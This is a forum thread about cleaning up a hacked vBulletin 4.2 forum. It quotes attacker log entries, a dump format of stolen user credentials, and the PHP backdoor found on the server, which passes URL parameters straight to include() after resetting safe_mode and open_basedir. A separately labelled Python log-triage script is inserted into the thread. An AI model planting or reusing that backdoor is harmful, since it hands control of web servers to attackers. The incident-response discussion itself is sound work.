Have you looked through your access_logs to see what is going on?
Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info
Please don't PM or VM me for support - I only help out in the threads.
vBulletin Manual & vBulletin 4.0 Code Documentation (API)
Want help modifying your vbulletin forum? Head on over to vbulletin.org
If I post CSS and you don't know where it goes, throw it into the additional.css template.
W3Schools <- awesome site for html/css help
-
Ok I'm digging deeper.
I just found a file called my.log in the root of the forum. It contains 2 users' info ... like this:
Code:
Array ( [userid] => 11582 [usergroupid] => 25 [membergroupids] => [infractiongroupids] => [username] => username here [password] => password here [salt] => salt code here [email] => email.address.here )
Code:
[Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
[Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
Code:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
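One way to triage error_log entries like the two quoted in the post above, as an added example that is not part of the original thread: it pulls the client address out of each "File name too long" entry, turns Apache's `\xNN` escapes back into readable text, and extracts the quoted nicknames and proxy so they can be compared with the forum's user table. The Windows-1251 charset, the Apache 2.2 line layout, and the sample addresses, host and nicknames are assumptions.

```python
import re

# Constructed sample in Apache 2.2 error_log layout, shortened from the pattern in
# the post above; client/proxy addresses, host and nicknames are placeholders.
SAMPLE_LOG = r'''[Sun Nov 10 06:36:29 2013] [error] [client 203.0.113.10] (36)File name too long: access to /index.php+++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"ExampleNickA";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.example/index.php
[Sun Nov 10 06:37:26 2013] [error] [client 203.0.113.20] (36)File name too long: access to /index.php+++Result:+using+proxy+198.51.100.20:3128;+chosen+nickname+"ExampleNickB";+registered; failed, referer: http://forum.example/index.php
[Sun Nov 10 06:40:02 2013] [error] [client 203.0.113.30] File does not exist: /var/www/favicon.ico
'''

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] '
    r'\(36\)File name too long: access to (?P<path>.+?) failed(?:, referer: .*)?$')
NICK_RE = re.compile(r'"([^"]+)"')
PROXY_RE = re.compile(r'using proxy (\d{1,3}(?:\.\d{1,3}){3}:\d+)')

def decode_path(path, charset="cp1251"):
    """Undo Apache's \\xNN escaping and the '+' padding of the requested path.
    charset is an assumption: the escaped bytes in the thread read as Windows-1251."""
    raw = re.sub(rb'\\x([0-9a-fA-F]{2})',
                 lambda m: bytes([int(m.group(1), 16)]),
                 path.encode("latin-1", "replace"))
    text = raw.decode(charset, errors="replace").replace("+", " ")
    return re.sub(r" {2,}", " ", text)

def triage(log_text, charset="cp1251"):
    """Return one record per over-long request: time, client, nicknames, proxies."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated error_log entry
        text = decode_path(m.group("path"), charset)
        hits.append({
            "time": m.group("ts"),
            "client": m.group("ip"),
            "nicknames": NICK_RE.findall(text),   # account names to look up
            "proxies": PROXY_RE.findall(text),    # relay the tool reported using
            "decoded": text,
        })
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["nicknames"], hit["proxies"])
        print("   ", hit["decoded"])
```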
-
up.
I deleted that PHP.INI.
I also found a new my.log file on the root.
-
Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?
Thanks
-
-
I have done the best I can to make it secure but my advice would be to remove that old version. What do you think, Joe? I always value your opinions.
Thanks
-
Yes, I would uninstall VBSEO.
VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break are still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/